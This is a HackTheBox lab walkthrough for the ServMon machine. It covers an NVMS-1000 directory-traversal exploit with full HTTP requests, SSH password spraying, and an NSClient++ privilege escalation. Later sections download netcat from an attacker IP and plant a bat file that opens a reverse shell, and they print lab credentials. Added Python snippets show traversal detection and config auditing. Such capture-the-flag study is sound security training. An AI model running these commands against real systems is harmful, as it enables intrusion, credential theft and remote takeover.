HackTheBox - ServMon | Walkthrough

As always, let's start with an nmap scan:

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.184 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//'); nmap -A -p"$ports" 10.10.10.184 -oN nmap

We see quite a few ports open.
Let's check FTP first, since anonymous login is enabled.

ftp 10.10.10.184 #login as anonymous

ftp> ls
01-18-20  12:05PM       <DIR>          Users
ftp> ls Users
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
ftp> ls Users/Nadine
01-18-20  12:08PM                  174 Confidential.txt
ftp> ls Users/Nathan
01-18-20  12:10PM                  186 Notes to do.txt
ftp> 

So, we have a few very interesting files here. Let's get them.

ftp> cd Users/Nadine/
ftp> get Confidential.txt
ftp> cd ../Nathan/
ftp> get "Notes to do.txt"

Now, let's check if we have write permissions here.

ftp> mkdir test
550 Access is denied. 
ftp> 

So, it seems like we don't have write permission here. Let's check the files that we downloaded.

root@kali:~/hackthebox/servmon# cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

So, there is a Passwords.txt file on Nathan's Desktop.

Now, let's check the other file:

root@kali:~/hackthebox/servmon# cat Notes\ to\ do.txt 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Okay, let's check what else we have here.
Let's try to curl the website.

root@kali:~/hackthebox/servmon# curl http://10.10.10.184/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title></title>
    <script type="text/javascript">
        window.location.href = "Pages/login.htm";
    </script>
</head>
<body>
</body>
</html>

It seems pretty simple: it's using JS to redirect us, so let's use Firefox to check it out.
Opening the website in Firefox, we are taken to a login page whose title is "NVMS-1000".
Interesting.
Let's look for a publicly available exploit for it!

searchsploit NVMS

So, we have one: a directory traversal.

cp /usr/share/exploitdb/exploits/hardware/webapps/47774.txt .

root@kali:~/hackthebox/servmon# cat 47774.txt 
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Let's fire up Burp and try the directory traversal.
Catch a request being sent to the server and send it to Repeater.

Now, sending this request:

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

We get the following response:

HTTP/1.1 200 OK
Content-type: 
Content-Length: 92
Connection: close
AuthInfo: 

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Nice, now let's try the Passwords.txt file in Nathan's Desktop.

GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

And the response:

HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo: 

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
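A defender-side view of the two traversal requests above, as an added example that is not part of the original write-up: it shows why naive path concatenation escapes the document root, a resolver that refuses parent-directory segments (including URL-encoded and double-encoded spellings), and a scan of access-log lines for such requests. The log lines, client IP and document root used here are constructed.

```python
import posixpath
from urllib.parse import unquote

# Constructed access-log lines modelled on the requests in this write-up; the
# client IP (documentation range) is made up.
SAMPLE_LOG = """\
192.0.2.10 - - [25/Apr/2020:10:01:02 +0000] "GET /Pages/login.htm HTTP/1.1" 200 1420
192.0.2.10 - - [25/Apr/2020:10:01:09 +0000] "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1" 200 92
192.0.2.10 - - [25/Apr/2020:10:01:15 +0000] "GET /..%2f..%2f..%2fUsers/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 156
192.0.2.10 - - [25/Apr/2020:10:01:20 +0000] "GET /images/logo.png HTTP/1.1" 200 3301
"""

def decode(raw_path: str) -> str:
    """Percent-decode twice (catches %252e double encoding) and fold backslashes."""
    return unquote(unquote(raw_path)).replace("\\", "/")

def is_traversal(raw_path: str) -> bool:
    """A web root never needs a parent-directory segment; any '..' is hostile."""
    return any(seg == ".." for seg in decode(raw_path).split("/"))

def normalize(raw_path: str) -> str:
    """Collapse '.'/'..' against a virtual '/' so the result cannot climb above it."""
    return posixpath.normpath("/" + decode(raw_path).lstrip("/"))

def naive_resolve(root: str, raw_path: str) -> str:
    """What the vulnerable server effectively does: glue the request path onto
    the document root and let the OS resolve '..', so the root is escaped."""
    return posixpath.normpath(root + "/" + unquote(raw_path))

def safe_resolve(root: str, raw_path: str):
    """Hardened version: refuse '..' outright, then join the normalised path."""
    if is_traversal(raw_path):
        return None
    return posixpath.normpath(root + normalize(raw_path))

def scan_log(log_text: str) -> list:
    """Return (client, target path) for every traversal attempt in the log."""
    hits = []
    for line in log_text.splitlines():
        try:
            path = line.split('"')[1].split()[1]  # second token of the request line
        except IndexError:
            continue
        if is_traversal(path):
            hits.append((line.split()[0], normalize(path)))
    return hits

if __name__ == "__main__":
    for client, target in scan_log(SAMPLE_LOG):
        print(f"traversal from {client} aimed at {target}")
```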

Now, let's save these passwords in a file.

vi pass.txt

And paste them in.

Now, let's make another file of the usernames that we know.

vi users.txt

Nadine
Nathan
Administrator

Now, let's try spraying these credentials on SSH.

msfconsole

use auxiliary/scanner/ssh/ssh_login

options
set rhosts 10.10.10.184
set user_file users.txt
set pass_file pass.txt
run

Nice, we get a hit!

[+] 10.10.10.184:22 - Success: 'Nadine:L1k3B1gBut7s@W0rk'

Easy.

Now, let's exit Metasploit and login with ssh.

ssh Nadine@10.10.10.184
#Now enter the password L1k3B1gBut7s@W0rk

Look! We get a shell! Beautiful!

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
                                                    
nadine@SERVMON C:\Users\Nadine>   

Nice, now you can go get the user.txt file.

I'll load up PowerShell, as I prefer working in it to a plain cmd shell.

nadine@SERVMON C:\Users\Nadine>powershell.exe -ExecutionPolicy bypass
Windows PowerShell                                          
Copyright (C) Microsoft Corporation. All rights reserved.   
                                                            
Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Nadine> 
PS C:\Users\Nadine> whoami /all

Okay, now let's try getting some information about the system.

PS C:\Users\Nadine> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
ERROR: Access denied
PS C:\Users\Nadine>

Yikes, okay. That's disallowed, too.

Going back to Nathan's notes, we see that he mentions NSClient. Let's see what that is and whether we have an exploit for it.

searchsploit nsclient

Nice, we do have an exploit! And guess what? It is for Privilege Escalation. Nice.

cp /usr/share/exploitdb/exploits/windows/local/46802.txt .

Now, on the victim machine:

cd "C:\Program Files\NSClient++"
type .\nsclient.ini

Here you should see:

; Undocumented key          
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1

Nice, now we have the password.
Also, CheckExternalScripts and Scheduler already seem to be enabled.
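Looking at that configuration from the defender's side, as an added example that is not part of the original write-up: a small audit of an nsclient.ini (constructed here with a placeholder password, mirroring the keys shown above and the [/modules] and [/settings/default] section layout NSClient++ uses) that flags the combination this box relies on: a clear-text API password in a readable file, a loopback-only "allowed hosts" restriction that a local login or SSH port forward satisfies, and external scripts exposed through the web API.

```python
import configparser

# Constructed nsclient.ini excerpt mirroring the keys shown in this write-up;
# the password is a placeholder, not the box's real value.
SAMPLE_INI = """\
[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
; Undocumented key
password = PLACEHOLDER_NOT_A_REAL_SECRET
; Undocumented key
allowed hosts = 127.0.0.1
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

def audit_nsclient(ini_text: str) -> list:
    """Return (code, explanation) findings for an NSClient++ configuration."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(ini_text)
    modules = cfg["/modules"] if cfg.has_section("/modules") else {}
    settings = cfg["/settings/default"] if cfg.has_section("/settings/default") else {}
    # configparser lower-cases option names, so module names compare in lower case
    enabled = {name for name, state in modules.items() if state.lower() == "enabled"}
    findings = []
    if settings.get("password"):
        findings.append(("PLAINTEXT_PASSWORD",
            "API password sits in clear text; nsclient.ini must not be readable by unprivileged users"))
    hosts = {h.strip() for h in settings.get("allowed hosts", "").split(",") if h.strip()}
    if hosts and hosts <= LOOPBACK:
        findings.append(("LOOPBACK_ONLY",
            "'allowed hosts' only trusts loopback, which any local login or SSH port forward satisfies"))
    if "checkexternalscripts" in enabled and "webserver" in enabled:
        findings.append(("SCRIPTS_VIA_API",
            "CheckExternalScripts + WEBServer: the REST API can add and run scripts as the service account"))
    if "checkexternalscripts" in enabled and "scheduler" in enabled:
        findings.append(("SCHEDULED_SCRIPTS",
            "Scheduler can run external scripts without an interactive caller"))
    return findings

if __name__ == "__main__":
    for code, why in audit_nsclient(SAMPLE_INI):
        print(f"[{code}] {why}")
```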

Now, let's download netcat.

cd C:\Temp\
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.80:80/nc.exe','C:\Temp\nc.exe')"

Now, we need a bat file that uses netcat to send us a reverse shell. For that, on your Kali machine, make a new file:

vi evil.bat 

@echo off 
C:\Temp\nc.exe 10.10.14.78 4444 -e cmd.exe

Now, let's download this file.

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.80:80/evil.bat','C:\Temp\abhizer.bat')"

Now, because only 127.0.0.1 is an allowed host, we need to forward the port.

But before that, let's try curling it.

curl https://127.0.0.1:8443/

We get an error; that's because in PowerShell, curl is an alias for Invoke-WebRequest. I don't like that, so let's remove it.

Remove-Item alias:curl
curl https://127.0.0.1:8443/

Now when we curl it, we are told that the certificate is untrusted, which is fine.

Let's forward that port. Quit the current ssh session and then:

ssh Nadine@10.10.10.184 -L 8443:127.0.0.1:8443

Now, from your local machine:

curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/abhizer.bat --data-binary @evil.bat
Added abhizer as scripts\abhizer.bat

Now, let's set up a netcat listener first:

nc -nvlp 4444

And, now call the script:

curl -s -k -u admin:ew2x6SsGTxjRwXOT "https://127.0.0.1:8443/api/v1/queries/abhizer/commands/execute?time=1s"

You should have a reverse shell as Administrator now!
Congratulations!